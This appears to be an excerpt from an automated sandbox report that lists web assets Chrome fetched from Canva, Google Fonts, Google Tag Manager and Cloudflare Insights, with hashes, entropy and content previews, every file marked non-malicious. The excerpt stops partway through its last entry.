                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1339)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):956250
                                                                                                                                                                                                                                                                    Entropy (8bit):5.621377224677058
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24576:tUvbScDi90HoN5Slnf7z4e/kd8O+elP/ZyAHsGoO5KiR9DPlen9N5W9CZybpeRGQ:KvbrDi90HoN5Slnf7z4e/kd81elP/ZyJ
                                                                                                                                                                                                                                                                    MD5:37FAEA3FE7A9E2A7176AAE5F11067AB0
                                                                                                                                                                                                                                                                    SHA1:8B5FAC88DC7F3FA45508D21E7D38411CE7B2D1F5
                                                                                                                                                                                                                                                                    SHA-256:989CACAB804905B086005FDDB09BA8BB0123F9721E7B1A3CE705AB0547E0568A
                                                                                                                                                                                                                                                                    SHA-512:3D180DDAC967E2B9CA9C8487BBC81D2F8E47811D93BDF9E26032A369BC6C6D814A4DF06645BFAE4BB035349A2E4421FE8AB9B63A3FF363AA01638D5C976E22C8
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://chunk-composing.canva.com/chunk-batch/40ceb5685514c3ac.js+29a6013e2c182f97.js+a191003715351325.js+005f43e2061f01f1.js+9107e36b81496080.js+e42c36f16cc6f532.js+dad3364637d681fb.strings.js
                                                                                                                                                                                                                                                                    Preview:;// __FILE_CONTENT_FOR__:40ceb5685514c3ac.js.(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5080],{../***/ 913728:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(552859);__web_req__(353279);__web_req__(388999);__web_req__(46127);__web_req__(694173);__web_req__(772112);__web_req__(232149);__web_req__(629056);__web_req__(293763);__web_req__(139504);__web_req__(713410);__web_req__(402398);__web_req__(550863);__web_req__(79194);__web_req__(277425);__web_req__(121446);__web_req__(932405);__web_req__(68864);__web_req__(323028);__web_req__(526023);__web_req__(17726);__web_req__(912002);__web_req__(517447);__web_req__(721935);__web_req__(224868);__web_req__(558104);__web_req__(798245);__web_req__(201099);__web_req__(131660);__web_req__(145431);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var Cx=__
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (40118)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):40182
                                                                                                                                                                                                                                                                    Entropy (8bit):5.238291704116309
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:768:P16oBlxiNNwt7WcMmz8DeNx1kyMPvZjyavLs75UEyCsechj5xu4s0tUO8ISje+m:Pk4IM49mcyNiZeavLnE/34j7dV1Sy
                                                                                                                                                                                                                                                                    MD5:8E3C6F8A76ECB27F12910C84ED17812F
                                                                                                                                                                                                                                                                    SHA1:AB5E807C5B68C461DFC2D2C39043B8D78714DF8A
                                                                                                                                                                                                                                                                    SHA-256:C89A128D6BC245B813910B47C73F450A7127F4C90559F00781FBA5879DEBDA59
                                                                                                                                                                                                                                                                    SHA-512:85D4B6FC59257E03443018BD418BD21B51E9B911FC7BD6A6B05CD269975F1A75E101CEBD1ECC11CC3CD0D59E8CF4120B8179952F1940D4695E2763E6DA509438
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/51bb9612ee6d1bb7.runtime.js
                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e,r,t,f,s,n={},c={};function i(e){var r=c[e];if(void 0!==r)return r.exports;var t=c[e]={id:e,loaded:!1,exports:{}};return n[e].call(t.exports,t,t.exports,i),t.loaded=!0,t.exports}i.m=n,i.amdD=function(){throw new Error("define cannot be used indirect")},i.amdO={},e=[],i.O=(r,t,f,s)=>{if(!t){var n=1/0;for(d=0;d<e.length;d++){for(var[t,f,s]=e[d],c=!0,a=0;a<t.length;a++)if((!1&s||n>=s)&&Object.keys(i.O).every((e=>i.O[e](t[a]))))t.splice(a--,1);else if(c=!1,s<n)n=s;if(c){e.splice(d--,1);var u=f();if(void 0!==u)r=u}}return r}else{s=s||0;for(var d=e.length;d>0&&e[d-1][2]>s;d--)e[d]=e[d-1];e[d]=[t,f,s]}},i.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return i.d(r,{a:r}),r},t=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,i.t=function(e,f){if(1&f)e=this(e);if(8&f)return e;if("object"==typeof e&&e){if(4&f&&e.__esModule)return e;if(16&f&&"function"==typeof e.then)return e}var s=Object.create(null);i.r(s);var n={};r=r||[null,t({}),t([]),t(t)];for(var c=
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):2312
                                                                                                                                                                                                                                                                    Entropy (8bit):4.096788340259145
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:CQuFoaPLZMYWubqPhmsql6p2z9G7O2QBcgHyB/tWav:2lPlbqPYsql0xgGtWA
                                                                                                                                                                                                                                                                    MD5:9ABC2241BF1479263A0A039F3D1E5B5C
                                                                                                                                                                                                                                                                    SHA1:A55CBCE3521486D4C9638602552F1DA877FB5411
                                                                                                                                                                                                                                                                    SHA-256:0145274162A30A4AA4B234015B7FE608367D10F4A8042D30BA995A5ECF1FDCF7
                                                                                                                                                                                                                                                                    SHA-512:0A5B51EEC0171CDDB3B5D9E7F7727D4509F33C63312136CD96A1E29BBC2FA35EFF341AEF41096809D482A16780CC376CAC488C3895E501A10C6FA66F6D8AEBD9
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/images/9abc2241bf1479263a0a039f3d1e5b5c.svg
                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#EF9645" d="M32.302 24.347c-.695-1.01-.307-2.47-.48-4.082-.178-2.63-1.308-5.178-3.5-7.216l-7.466-6.942s-1.471-1.369-2.841.103c-1.368 1.471.104 2.84.104 2.84l3.154 2.934 2.734 2.542s-.685.736-3.711-2.078l-10.22-9.506s-1.473-1.368-2.842.104c-1.368 1.471.103 2.84.103 2.84l9.664 8.989c-.021-.02-.731.692-.744.68L5.917 5.938s-1.472-1.369-2.841.103c-1.369 1.472.103 2.84.103 2.84L13.52 18.5c.012.012-.654.764-.634.783l-8.92-8.298s-1.472-1.369-2.841.103c-1.369 1.472.103 2.841.103 2.841l9.484 8.82c.087.081-.5.908-.391 1.009l-6.834-6.356s-1.472-1.369-2.841.104c-1.369 1.472.103 2.841.103 2.841L11.896 30.71c1.861 1.731 3.772 2.607 6.076 2.928.469.065 1.069.065 1.315.096.777.098 1.459.374 2.372.934 1.175.72 2.938 1.02 3.951-.063l3.454-3.695 3.189-3.412c1.012-1.082.831-2.016.049-3.151z"/><path d="M1.956 35.026a.999.999 0 0 1-.707-1.707L4.8 29.77a.999.999 0 1 1 1.414 1.414l-3.551 3.55a.996.996 0 0 1-.707.292zm6.746.922a.999.999 0 0
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):1350
                                                                                                                                                                                                                                                                    Entropy (8bit):5.437574579461789
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24:81/nQOY7a4gwAZzhnQOY7a4g0tJc+u/rnQOY7a4gHwy96cGSSf7:coOEa4gvGOEa4gaJc+uUOEa4gHN0xD
                                                                                                                                                                                                                                                                    MD5:048827075038BB29A926100FAC103075
                                                                                                                                                                                                                                                                    SHA1:344B5CF6498867A1806DB0287F339B12C00F34B5
                                                                                                                                                                                                                                                                    SHA-256:88F23B85D81514D63DA43985D4E8BE67C1D4235E42768EBDC3783F88FB36C1E0
                                                                                                                                                                                                                                                                    SHA-512:CFFBB765A48E681EAF3D11CA60999C4886A2CD88CCFCA7B6260AECD880B17ED2764568418D6D4086049D6E0F296BAF33E8F8979017541877F0D96B1AF6A16C6E
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap
                                                                                                                                                                                                                                                                    Preview:/* vietnamese */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rHmsJCQ.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rXmsJCQ.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3086)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):6002
                                                                                                                                                                                                                                                                    Entropy (8bit):5.685045939644596
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:LZGyd8HxJ6pe62ycZamrgPMIHUMub1cdHQ23rKFfIbHOdEl1:LZLdsxMpz2HZ1EPMlMK1cdT3+FfmOqP
                                                                                                                                                                                                                                                                    MD5:3DFF60FF0A6BBD8440A5A22444DBB88C
                                                                                                                                                                                                                                                                    SHA1:7BDE0CB145577E411C57D4CED1CA7E79C07C9515
                                                                                                                                                                                                                                                                    SHA-256:DDCDF284B1509352C2B622B6C9B7936DA37E93ADF75070273D12D72DCF876AF7
                                                                                                                                                                                                                                                                    SHA-512:03BEF8981469EB6394AEA2B3D346BDA55D883075ED73E4AE99D617C87A4EBAF36202FCB1DCCC8E3DC4D2FC67D2DC4915E1C0A43AAF27CC7C75CC07A6C631DDDF
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/950e236801028122.js
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[3389],{../***/ 201099:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(121446);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var D=__c.D;var hz;var W=__c.W;var Oa=__c.Oa;var G=__c.G;var id=__c.id;var E=__c.E;var M=__c.M;var T=__c.T;var Q=__c.Q;var L=__c.L;var t=__c.t;var ez;__c.bz=function(a){t(0<a.length);t(a.every(b=>0>b.indexOf("?")));return __c.az(new __c.JOa(["",...a.map(encodeURIComponent)].join("/")))};__c.az=function(a,b){if(!b)return a;if(b instanceof Map)for(const [c,d]of b)__c.cz(a,c,d);else for(const c in b)__c.cz(a,c,b[c]);return a};.__c.cz=function(a,b,c){t(0<b.length);t(!a.params.has(b));if(null!=c)if(Array.isArray(c)){c=c.filter(__c.eb);if(0===c.length)return a;t(c.every(d=>"number"===typeof d||"string"===typeof d));a.params.set(
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):1525
                                                                                                                                                                                                                                                                    Entropy (8bit):4.359418865415674
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24:t41Ri5D1JURsYbz3QHcchcNq2tkJzvEL16squq3qcEgtNibpq5S+2OV/LvBe8rTd:CsTJnoLdk1Eg7llEuN8M5SjKBeM31dy+
                                                                                                                                                                                                                                                                    MD5:8777E8ED572C4159D71B08CCA2972B15
                                                                                                                                                                                                                                                                    SHA1:2A57B1E6F2667BA1364CF459161FB868B53C37B8
                                                                                                                                                                                                                                                                    SHA-256:E1795BC184F97F29790C807FC91C70846D221904576727698728271D7071F268
                                                                                                                                                                                                                                                                    SHA-512:43276A2282A1B088AF417B61942B880253F9D1FCDFFF802F2EBD5BE935D4A708C2AA90842247147D5274CDE52D2B06B5659A607593925822539D6985AE84CFD0
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><circle fill="#FFCB4C" cx="18" cy="17.018" r="17"/><path fill="#65471B" d="M14.524 21.036a.914.914 0 0 1-.312-.464.799.799 0 0 1 .59-1.021c4.528-1.021 7.577 1.363 7.706 1.465.384.306.459.845.173 1.205-.286.358-.828.401-1.211.097-.11-.084-2.523-1.923-6.182-1.098a.91.91 0 0 1-.764-.184z"/><ellipse fill="#65471B" cx="13.119" cy="11.174" rx="2.125" ry="2.656"/><ellipse fill="#65471B" cx="24.375" cy="12.236" rx="2.125" ry="2.656"/><path fill="#F19020" d="M17.276 35.149s1.265-.411 1.429-1.352c.173-.972-.624-1.167-.624-1.167s1.041-.208 1.172-1.376c.123-1.101-.861-1.363-.861-1.363s.97-.4 1.016-1.539c.038-.959-.995-1.428-.995-1.428s5.038-1.221 5.556-1.341c.516-.12 1.32-.615 1.069-1.694-.249-1.08-1.204-1.118-1.697-1.003-.494.115-6.744 1.566-8.9 2.068l-1.439.334c-.54.127-.785-.11-.404-.512.508-.536.833-1.129.946-2.113.119-1.035-.232-2.313-.433-2.809-.374-.921-1.005-1.649-1.734-1.899-1.137-.39-1.945.321-1.542 1.561.604 1.854.208 3.375-.83
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (19948), with no line terminators
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):19948
                                                                                                                                                                                                                                                                    Entropy (8bit):5.261902742187293
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:384:XriNpnjyMkg8XMtExRN1w29JIOzahXtO2nJ65:GijgSWuanfJ65
                                                                                                                                                                                                                                                                    MD5:EC18AF6D41F6F278B6AED3BDABFFA7BC
                                                                                                                                                                                                                                                                    SHA1:62C9E2CAB76B888829F3C5335E91C320B22329AE
                                                                                                                                                                                                                                                                    SHA-256:8A18D13015336BC184819A5A768447462202EF3105EC511BF42ED8304A7ED94F
                                                                                                                                                                                                                                                                    SHA-512:669B0E9A545057ACBDD3B4C8D1D2811EAF4C776F679DA1083E591FF38AE7684467ABACEF5AF3D4AABD9FB7C335692DBCA0DEF63DDAC2CD28D8E14E95680C3511
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015
                                                                                                                                                                                                                                                                    Preview:!function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]]].join("")}},944:function(e){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(t){var n=new Uint8Array(16);e.exports=function(){return t(n),n}}else{var r=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),r[t]=e>>>((3&t)<<3)&255;return r}}},508:function(e,t,n){"use strict";var r=n(944),i=n(343);e.exports=function(e,t,n){var o=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var a=(e=e||{}).random||(e.rng||r)();if(
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (48081)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):366330
                                                                                                                                                                                                                                                                    Entropy (8bit):5.550494155241815
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6144:iecWYmss82yMXLiOkaPmP9oDmoMfgQJVykf:idWYmk2znPmVN
                                                                                                                                                                                                                                                                    MD5:D82BE7C72BA3BA10C4880D341A2259AD
                                                                                                                                                                                                                                                                    SHA1:F2AE98D7C66B465FB42EE8DD0BAEAA074B38A9FF
                                                                                                                                                                                                                                                                    SHA-256:3036FD845B91F1BB09F79B94E2F8E5B02EBA590EF8BD6E7B2E4376052A140DDB
                                                                                                                                                                                                                                                                    SHA-512:2AB890DE548AE8316BC913E01C7FFAD69E6CE3E894C5A81EA8A7CD518A0398322E48F49D95F11CFDDC071A7151C5D6416A33AAD60EBBFCA1CB4CD45FB986A2EE
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"290",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"label"},{"function":"__r"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"form_content"},{"function":"__c","vtp_value":"844585682227065"},{"function":"__cvt_12729902_717"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"product_variant"},{"function":"__v","convert_case_to":1,"vtp_dataLayerVersion":2,"vtp_setDefaultValue":fa
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (19185)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):19628
                                                                                                                                                                                                                                                                    Entropy (8bit):5.199142346488417
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:384:0Ot5jB1rzOt2wXIAhGovwZnAKvmqJALIBXgK8qp218qrNnoEnuIh1XxfeYqtAqY8:r5PaBvoXeLawz1DZqwZQ
                                                                                                                                                                                                                                                                    MD5:C261587FC6DA6C6FCD58CC2A945BA8A4
                                                                                                                                                                                                                                                                    SHA1:3B16BBE9473A14CD390F15865B4B71C83F4F5214
                                                                                                                                                                                                                                                                    SHA-256:A99C949A0A535277464B54A138F84E56005B35C877C2EEBAB4B13A85130034EF
                                                                                                                                                                                                                                                                    SHA-512:E170835C1B73ECF68B13CC78DE98A70C9B772BED166D1A18CE04BBDC0176B5EFCFAF0CB77A4DE556BCBD9DF2B5BC81DFAD776B43994048D951E1FCDB26168376
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:(function() {. const messages = JSON.parse("{\"eq4PgA\":\"Didn.t get the code? Resend code\",\"in7gzw\":\".{0} . {1}\",\"BQkOCQ\":\"{0}K\",\"iGADsg\":\"Skip to search\",\"mYD1Jg\":\"Confirm\",\"PFOUew\":\"Continue\",\"FvYu7Q\":\"This password is common and easy to guess.\",\"08inLQ\":\"Page {0}\",\"m0Q+yA\":\"You.re invited to edit a design created by {0}, start designing now\",\"/JYvRA\":\"Set password\",\"iTruLw\":\"Strong\",\"Gm1Hxg\":\"Too weak\",\"tkkB/A\":\"Names and surnames are easily guessed.\",\"DiRXIw\":\"June\",\"XS/GBQ\":\"Untitled\",\"GQHbPg\":\"Reset your password\",\"bSA5qA\":\"To protect your privacy we can.t allow you to create a Canva account yourself.\",\"LE4MeQ\":\"Esc\",\"UY/ePA\":\"{0}M\",\"q4OW6A\":\"Your birthday can.t be in the future\",\"eKXiSQ\":\"Password\",\"/fLNHg\":\"When you set up two factor authentication we gave you some backup codes. You can use one of them here to regain access to your account.\",\"yAXvfg\":\"Create your own design with
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (23193)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):89879
                                                                                                                                                                                                                                                                    Entropy (8bit):5.564242221809525
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:768:VwxoMz2BMKGwgreI0keXg6mq/Qn7pdTOaG2bEvv2r9uQnkP9FjrC8o7xUo7xX6lJ:z/QXO/QkPvjrfo7xUo7xqWc
                                                                                                                                                                                                                                                                    MD5:6FFF75F18776BC585B47AA8F54302C28
                                                                                                                                                                                                                                                                    SHA1:94FF8A47733444C551F81FB6EB1361EAB5EAF30C
                                                                                                                                                                                                                                                                    SHA-256:3761849A8797D81436FC22F6DFF4E08EB9DCABBFB9D86FD138904FF61B767783
                                                                                                                                                                                                                                                                    SHA-512:1CB2CA893005F3BC3A3E1B52888BBBCDC1AC45768D4D768CA67B4EBE121EED7F1E7D893E2CC58D21D88E2B46531BF8B53F4B09A19116545A678C1089E5B6C7AA
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://chunk-composing.canva.com/chunk-batch/9791fb4bf6628247.ltr.css+5eb15c719412ac66.ltr.css+a1dc22ba8402ef3d.ltr.css+a0684b0780c739e9.vendor.ltr.css+ddcf8590ae7c901d.ltr.css+ca9cfd0af880d084.ltr.css+14a7f0159a2b69de.ltr.css+202e686830bf1e42.ltr.css+d8958d2938e6e8fe.ltr.css+bc2b400c76016a88.ltr.css+7fc1a90e4d75fcc9.ltr.css
                                                                                                                                                                                                                                                                    Preview:/* __FILE_CONTENT_FOR__:9791fb4bf6628247.ltr.css */..J3EHFQ{box-sizing:border-box;display:flex;height:100%;isolation:isolate;position:relative;width:100%}.ePBYCw{flex-direction:column}.GifE4Q{align-items:center;flex-direction:row;height:-webkit-fit-content;height:-moz-fit-content;height:fit-content}.MdXQHA{display:flex;overflow:hidden}.GifE4Q .MdXQHA{align-self:start;flex-shrink:0;overflow:hidden;position:relative}.pELLCA{flex:auto}.gwb2Ug{bottom:0;box-sizing:border-box;height:100%;left:0;outline-offset:-3px;position:absolute;right:0;top:0;width:100%;z-index:0}._7YslCg{outline:none}.e_NdpQ{cursor:pointer}.ktRLCA.J3EHFQ{opacity:.4}.ktRLCA .e_NdpQ{cursor:not-allowed}._9Al4OQ{display:block;height:auto;max-height:100%;max-width:100%;min-height:100%;min-width:100%;object-fit:cover;width:auto}.LvdRkg{position:relative}.LvdRkg:after{bottom:2px;box-shadow:0 0 0 2px var(--9_Lxmw),inset 0 0 0 2px var(--C-q6Ig);content:"";left:2px;opacity:0;pointer-events:none;position:absolute;right:2px;top:2px}
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):354
                                                                                                                                                                                                                                                                    Entropy (8bit):5.6762578005096325
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6:YkHKKF7r48evSQNWKtI3s0ud9lbpYhF81ExPA6WrGbfm4XCE2p64phvxg7h+7uH1:YkqmXnwScWKwwlF+F81ExPA3Cmamp62S
                                                                                                                                                                                                                                                                    MD5:B4F9F0DD587C5ABE6708F44A6E11A53F
                                                                                                                                                                                                                                                                    SHA1:28EBFA68F92AE2A96354521FFAD38A3DBE647154
                                                                                                                                                                                                                                                                    SHA-256:CCC37C837397D66FD8E0FACFE001CE7FC9F87E48089D73540AD2C2DD95716D04
                                                                                                                                                                                                                                                                    SHA-512:D471D889D8EAE3E9190B39376C29400D5AB9BF3C47897B64DC278E4E58314A78F148A44BB315D51591CA5384EAE505AD411BEF7AA706FDD5678023109A809425
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:{"pixelJwt": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJwaXhlbCBjb25maWciLCJuYW1lIjoiQ2FudmEgSW5jLiIsImlzcyI6Im1ldGFkYXRhIGluYy4iLCJhdWQiOiIxNzIxIiwiZXhwIjoxNzY3MTE5NDAwLCJpYXQiOjE3MjExMzcxMDYsIm5iZiI6MTcxOTc3MjIwMCwiY29sbGVjdEluc2lnaHRzIjowLCJwYWNrYWdlIjoiRlVMTF9GVU5DVElPTkFMSVRZIiwiaXNfcGxnIjoiMCJ9.wMldEMSftyWmTu8VELd7xI0gDpqzWR64-SlbjetKBO8"}.
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (48081)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):366330
                                                                                                                                                                                                                                                                    Entropy (8bit):5.550494155241815
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6144:iecWYmss82yMXLiOkaPmP9oDmoMfgQJVykf:idWYmk2znPmVN
                                                                                                                                                                                                                                                                    MD5:D82BE7C72BA3BA10C4880D341A2259AD
                                                                                                                                                                                                                                                                    SHA1:F2AE98D7C66B465FB42EE8DD0BAEAA074B38A9FF
                                                                                                                                                                                                                                                                    SHA-256:3036FD845B91F1BB09F79B94E2F8E5B02EBA590EF8BD6E7B2E4376052A140DDB
                                                                                                                                                                                                                                                                    SHA-512:2AB890DE548AE8316BC913E01C7FFAD69E6CE3E894C5A81EA8A7CD518A0398322E48F49D95F11CFDDC071A7151C5D6416A33AAD60EBBFCA1CB4CD45FB986A2EE
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtm.js?id=GTM-TZPTKRR&l=dataLayer
                                                                                                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"290",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"label"},{"function":"__r"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"form_content"},{"function":"__c","vtp_value":"844585682227065"},{"function":"__cvt_12729902_717"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"product_variant"},{"function":"__v","convert_case_to":1,"vtp_dataLayerVersion":2,"vtp_setDefaultValue":fa
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):84
